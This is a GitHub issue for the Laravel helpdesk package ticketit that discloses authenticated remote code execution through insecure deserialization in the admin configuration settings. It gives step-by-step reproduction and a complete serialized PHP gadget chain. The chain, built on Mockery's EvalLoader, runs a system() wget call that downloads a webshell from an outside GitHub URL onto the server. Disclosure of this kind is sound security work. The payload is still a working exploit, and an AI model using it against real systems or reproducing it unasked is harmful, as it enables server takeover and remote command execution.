thekordy / ticketit

A simple helpdesk tickets system for Laravel 5.1+ which integrates smoothly with Laravel default users and auth system, demo is available at: http://ticketit.kordy.info/tickets
MIT License
875 stars 387 forks source link

Authenticated Remote Code Execution via Insecure Deserialization #590

Open ghost opened 3 years ago

ghost commented 3 years ago

Hello,

I recently found it is possible to inject OS commands in the tickets-admin configuration. Steps to reproduce:

  1. Log into TicketIt
  2. Go to Settings -> Configuration
  3. Go to "Initial" tab
  4. Change bootstrap_version from 4 to 3
  5. Go to "Other" tab, click Add New Setting
  6. Put any value you want as the slug
  7. Paste this payload into the "Default Value" and/or "My Value" values: a:2:{i:7;O:29:"Illuminate\Support\MessageBag":2:{S:11:"\00*\00messages";a:0:{}S:9:"\00*\00format";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{S:9:"\00*\00events";O:25:"Illuminate\Bus\Dispatcher":1:{S:16:"\00*\00queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;S:4:"load";}}S:8:"\00*\00event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{S:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{S:9:"\00*\00config";O:35:"Mockery\Generator\MockConfiguration":1:{S:7:"\00*\00name";S:7:"abcdefg";}S:7:"\00*\00code";S:104:"<?php system('wget https://raw.githubusercontent.com/drag0s/php-webshell/master/webshell.php'); exit; ?>";}}}}i:7;i:7;}
  8. Click Submit
  9. Go to the new setting
  10. Click "Edit", now there is a webshell available at http://localhost:8000/webshell.php